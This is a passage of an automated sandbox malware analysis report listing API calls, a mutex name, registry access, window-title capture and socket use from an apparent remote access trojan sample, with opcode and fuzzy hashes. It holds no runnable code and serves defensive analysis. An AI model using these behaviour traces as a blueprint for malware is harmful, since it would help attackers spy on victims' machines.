                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                          • String ID:
                                          • API String ID: 3360349984-0
                                          • Opcode ID: 9e0a8eaf4219b775e830663fcb54a959b6233ae16d1ef5de7dcca6256e783451
                                          • Instruction ID: 30d48123e17294c38ae6f490953f1b42a5ca81467cb0df1087f173bd09261e59
                                          • Opcode Fuzzy Hash: 9e0a8eaf4219b775e830663fcb54a959b6233ae16d1ef5de7dcca6256e783451
                                          • Instruction Fuzzy Hash: 684182B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                                          APIs
                                          • socket.WS2_32(?,00000001,00000006), ref: 00404852
                                          • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E
                                            • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateEventStartupsocket
                                          • String ID: xd
                                          • API String ID: 1953588214-1412088292
                                          • Opcode ID: 4d13770ae0ce35ce4dbd6fcc6f24a1261d6c2af77246669734211e402fddb5c6
                                          • Instruction ID: d30f6c82ceabff406a890a607b6903e59214fa94f63df9469096212d3e1caec2
                                          • Opcode Fuzzy Hash: 4d13770ae0ce35ce4dbd6fcc6f24a1261d6c2af77246669734211e402fddb5c6
                                          • Instruction Fuzzy Hash: F90171B1408B809ED7359F28A8456967FE0AB55304F044D6EF1DA97B92D3B5A881CB18
                                          APIs
                                          • getaddrinfo.WS2_32(00000000,00000000,00000000,xd,004750F4,00000000,004151C3,00000000,00000001), ref: 00414F46
                                          • WSASetLastError.WS2_32(00000000), ref: 00414F4B
                                            • Part of subcall function 00414DC1: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                                            • Part of subcall function 00414DC1: LoadLibraryA.KERNEL32(?), ref: 00414E52
                                            • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                                            • Part of subcall function 00414DC1: FreeLibrary.KERNEL32(00000000), ref: 00414E79
                                            • Part of subcall function 00414DC1: LoadLibraryA.KERNEL32(?), ref: 00414EB1
                                            • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                                            • Part of subcall function 00414DC1: FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                                            • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                          • String ID: xd
                                          • API String ID: 1170566393-1412088292
                                          • Opcode ID: 930efd5b04e65bc9372c1b57b3a52d6002a1f5a2d46d5e1141b82df15956c107
                                          • Instruction ID: b2b0aefd8e35b341f4c894e58f46b645776b5e98a3349e02c71c7f637998c076
                                          • Opcode Fuzzy Hash: 930efd5b04e65bc9372c1b57b3a52d6002a1f5a2d46d5e1141b82df15956c107
                                          • Instruction Fuzzy Hash: 9DD05B322005316BD310576D6C00FFB569EDFD7760B110037F404D3251DA949C8247AC
                                          APIs
                                          • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EC43,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0040D0B3
                                          • GetLastError.KERNEL32 ref: 0040D0BE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateErrorLastMutex
                                          • String ID: Rmc-8AGIM5
                                          • API String ID: 1925916568-3827265645
                                          • Opcode ID: aba24bfd7e8b808837b934fb3074bb655e41bd047bfda9aafcf34366fa62f390
                                          • Instruction ID: 897831e38bae895769414ba5eaefcaa992d87aaaa8244aa01aad5f1db7de32a1
                                          • Opcode Fuzzy Hash: aba24bfd7e8b808837b934fb3074bb655e41bd047bfda9aafcf34366fa62f390
                                          • Instruction Fuzzy Hash: 62D012B0614301EBDB0467709C5975936559B44702F50487AB50BD95F1CBFC88D08519
                                          APIs
                                          • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                          • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00413622
                                          • RegCloseKey.KERNEL32(?), ref: 0041362D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseOpenQueryValue
                                          • String ID:
                                          • API String ID: 3677997916-0
                                          • Opcode ID: e238dbc9e2073977e027648aa5af93dfac856dda57be128719874f60decc0002
                                          • Instruction ID: 0661f39b514c0023b6096d8878825bbc81d19e8e8981dfb5b132c5fecbfe39b6
                                          • Opcode Fuzzy Hash: e238dbc9e2073977e027648aa5af93dfac856dda57be128719874f60decc0002
                                          • Instruction Fuzzy Hash: 4A01D676900228FBCB209B91DC08DEF7F7DDB44B51F004066BB05A2240DA748E45DBA4
                                          APIs
                                          • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,00475300), ref: 0041374F
                                          • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00413768
                                          • RegCloseKey.KERNEL32(00000000), ref: 00413773
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseOpenQueryValue
                                          • String ID:
                                          • API String ID: 3677997916-0
                                          • Opcode ID: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                          • Instruction ID: cdc8bb2f12cdea1da97e3e4d454c68039a4c25ad8704162e95ac064a0ac82555
                                          • Opcode Fuzzy Hash: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                          • Instruction Fuzzy Hash: C301AD7540022DFBDF215F91DC04DEB3F38EF05761F008065BE09620A1E7358AA5EB94
                                          APIs
                                          • GetEnvironmentStringsW.KERNEL32 ref: 0044F461
                                          • _free.LIBCMT ref: 0044F49A
                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F4A1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: EnvironmentStrings$Free_free
                                          • String ID:
                                          • API String ID: 2716640707-0
                                          • Opcode ID: 529e42a1fa36a4ac6123fcdb0dfb42304a8dc5a6142a13bb334c2dd4b346bc22
                                          • Instruction ID: 0fde98e0ac238faa149cd6f420f555edc5ad685e5938876998fddc3cfa248eb7
                                          • Opcode Fuzzy Hash: 529e42a1fa36a4ac6123fcdb0dfb42304a8dc5a6142a13bb334c2dd4b346bc22
                                          • Instruction Fuzzy Hash: 41E0E537545A226BB211323A6C49D6F2A58CFD27B6726003BF40486242EE288D0641BA
                                          APIs
                                          • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
                                          • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,00475300), ref: 004135C2
                                          • RegCloseKey.KERNEL32(?), ref: 004135CD
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseOpenQueryValue
                                          • String ID:
                                          • API String ID: 3677997916-0
                                          • Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                          • Instruction ID: 3ea041f737baa467864e73cd7e114674dd940ed34319bd14b5ec79364d8ab256
                                          • Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                          • Instruction Fuzzy Hash: 39F01D76900218FFDF109FA09C45FEE7BBDEB04B11F1044A5BA04E6191D6359F549B94
                                          APIs
                                          • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,00000000,?,?,0040C1D7,00466C58), ref: 00413551
                                          • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,0040C1D7,00466C58), ref: 00413565
                                          • RegCloseKey.KERNEL32(?,?,?,0040C1D7,00466C58), ref: 00413570
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseOpenQueryValue
                                          • String ID:
                                          • API String ID: 3677997916-0
                                          • Opcode ID: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                          • Instruction ID: 960a54a16a1ccd4152458ec6927d20d37e2092670a33f2d7c306b576a706ad25
                                          • Opcode Fuzzy Hash: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                          • Instruction Fuzzy Hash: 23E06532801238FBDF204FA29C0DDEB7F6CDF06BA1B000155BD0CA1111D2258E50E6E4
                                          APIs
                                          • RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                          • RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
                                          • RegCloseKey.KERNEL32(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseCreateValue
                                          • String ID:
                                          • API String ID: 1818849710-0
                                          • Opcode ID: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                          • Instruction ID: 04d77b696783773a8a307df6842786532c8303179302b097fa31242bc3118ae5
                                          • Opcode Fuzzy Hash: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                          • Instruction Fuzzy Hash: 1EE06D72500318FBDF109FA0DC06FEA7BACEF04B62F104565BF09A6191D6358E14E7A8
                                          APIs
                                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041B85B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: GlobalMemoryStatus
                                          • String ID: @
                                          • API String ID: 1890195054-2766056989
                                          • Opcode ID: 23b0e77897189e0b78fa4d1d520ef24eb5f5038ce1868e817330353f58216111
                                          • Instruction ID: 3eac6c9810fdf3f5cdd4c6aee73cb3509883e52e26c84b2cc96e0464d85798e3
                                          • Opcode Fuzzy Hash: 23b0e77897189e0b78fa4d1d520ef24eb5f5038ce1868e817330353f58216111
                                          • Instruction Fuzzy Hash: F6D017B58023189FC720DFA8E804A8DBBFCEB08210F00456AEC49E3300E770EC008B84
                                          APIs
                                          • _free.LIBCMT ref: 00446227
                                            • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                          • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?,0000000F,00000000,00432F93,00000000,0000000F,0042F99D,?,?,00431A44,?,?,00000000), ref: 00446263
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap$_free
                                          • String ID:
                                          • API String ID: 1482568997-0
                                          • Opcode ID: b157f1fc507fc560bd00b565224a750c722b28025775eaa04a87fd2772ac9c2e
                                          • Instruction ID: 528349031ecf72c594af6ac828cc426c74ce8c7b4bfa82022820746e0f177899
                                          • Opcode Fuzzy Hash: b157f1fc507fc560bd00b565224a750c722b28025775eaa04a87fd2772ac9c2e
                                          • Instruction Fuzzy Hash: 4CF0283110121176BB213B266C01B6B3759AF83B70B1700ABFC1466281CFBCCC41406F
                                          APIs
                                          • GetForegroundWindow.USER32 ref: 0041BB49
                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 0041BB5C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Window$ForegroundText
                                          • String ID:
                                          • API String ID: 29597999-0
                                          • Opcode ID: 2784d0b2db336add8319ad638143428ee57387129fbd6e48793ce9af45086994
                                          • Instruction ID: 8c7c0eb369f00208a7459315ff6bb8442305c4ed6b2016914032ba092e23deac
                                          • Opcode Fuzzy Hash: 2784d0b2db336add8319ad638143428ee57387129fbd6e48793ce9af45086994
                                          • Instruction Fuzzy Hash: 21E04875A00328A7E720A7A5AC4EFD5776C9708755F0001AEBA1CD61C2EDB4AD448BE5
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _wcslen
                                          • String ID:
                                          • API String ID: 176396367-0
                                          • Opcode ID: 6416f66ed626dfbba5e3356b56a4da38da9dbdb7e4b27ac51402a9fd72fbddea
                                          • Instruction ID: d045c5f40cf3cd8d18dd0e016010c764e1ae3afdbf5b32035de166f485dbb4de
                                          • Opcode Fuzzy Hash: 6416f66ed626dfbba5e3356b56a4da38da9dbdb7e4b27ac51402a9fd72fbddea
                                          • Instruction Fuzzy Hash: 681193319002059BCB15EF66E842AEE7BB5AF54314B10403FF446672E2EF78AD15CB98
                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                          • Instruction ID: 139fbca062bb8bf671a891d82c3cf8fc988f9ce198a1a8b78c24da0334343556
                                          • Opcode Fuzzy Hash: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                          • Instruction Fuzzy Hash: CEE0E531A0021267F6312A269C01B5B76599B437A0F170137AD15922D2CE6CCD0181EF
                                          APIs
                                          • WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Startup
                                          • String ID:
                                          • API String ID: 724789610-0
                                          • Opcode ID: 8e7c991b928bea2de9b1e1f5f99946c2d0cf66c9d18890e3be99548e9599c2f5
                                          • Instruction ID: 8755cd578eecc9cf916cb98f31ec890f8d4d8ec8e876fe09ba6f20fbb4fb2f80
                                          • Opcode Fuzzy Hash: 8e7c991b928bea2de9b1e1f5f99946c2d0cf66c9d18890e3be99548e9599c2f5
                                          • Instruction Fuzzy Hash: 02D0123255C60CCED620ABB4AD0F8A4775CC717616F0403BA6CB5C26D7E6405A2DC2AB
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: recv
                                          • String ID:
                                          • API String ID: 1507349165-0
                                          • Opcode ID: f4db5bd4806bc66e377c48788e3214861744c877e7cd4eb35e6567da0e63c1ec
                                          • Instruction ID: c63eaffdb417a6470c671315a396a42075a312041b5b8b5670d44767818a4bbd
                                          • Opcode Fuzzy Hash: f4db5bd4806bc66e377c48788e3214861744c877e7cd4eb35e6567da0e63c1ec
                                          • Instruction Fuzzy Hash: 26B09279108202FFCA150B60CC0886ABEA6ABC8382B00882DB586411B0C736C851AB26
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
